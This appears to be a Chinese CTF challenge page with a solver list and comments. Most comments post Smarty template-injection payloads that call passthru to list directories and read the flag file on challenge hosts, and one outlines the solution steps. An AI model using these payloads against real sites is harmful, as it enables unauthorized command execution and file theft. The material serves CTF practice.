评分(14)
解题动态
Pow_Ew 攻破了该题 2天前
CTF-大王 攻破了该题 3天前
写作业ing 攻破了该题 3天前
xiaomenghua 攻破了该题 3天前
xdmin 攻破了该题 4天前
我只有两题不会 攻破了该题 5天前
星宇Sec 攻破了该题 6天前
加州故事 攻破了该题 6天前
EvinZe 攻破了该题 6天前
jwleft 攻破了该题 6天前
香克斯呀 攻破了该题 6天前
风度空山 攻破了该题 6天前
xym 攻破了该题 7天前
兄弟不要颓废 攻破了该题 7天前
lvzhimo 攻破了该题 8天前
Y4n9 攻破了该题 10天前
mystery 攻破了该题 10天前
司徒草青 攻破了该题 11天前
⎝屎壳郎⎠ 攻破了该题 11天前
评论
灵梦归希 1月前
举报
这道题可以加大难度的。把_14781改为flag.txt就可以了.只是套一层娃而已
icyskin 2月前
举报
http://160.202.254.160:17350/?key={{passthru(%27tail%20-100%20/_14781%27)}}
fuhaiyan 8月前
举报
?a={{passthru('more ../../../*|grep fla')}}
对对对对对对对对 10月前
举报
?key={{passthru(%27tac%20/_4427%27)}}
anony 1年前
举报
flag{********}
人闲桂花落 1年前
举报
tac命令读取也可
docker0w 2年前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 2年前
举报
?key={passthru("tac%20/_28710")}
yun20231227 2年前
举报
?key={{passthru('ls /')}}
xinkuang 2年前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}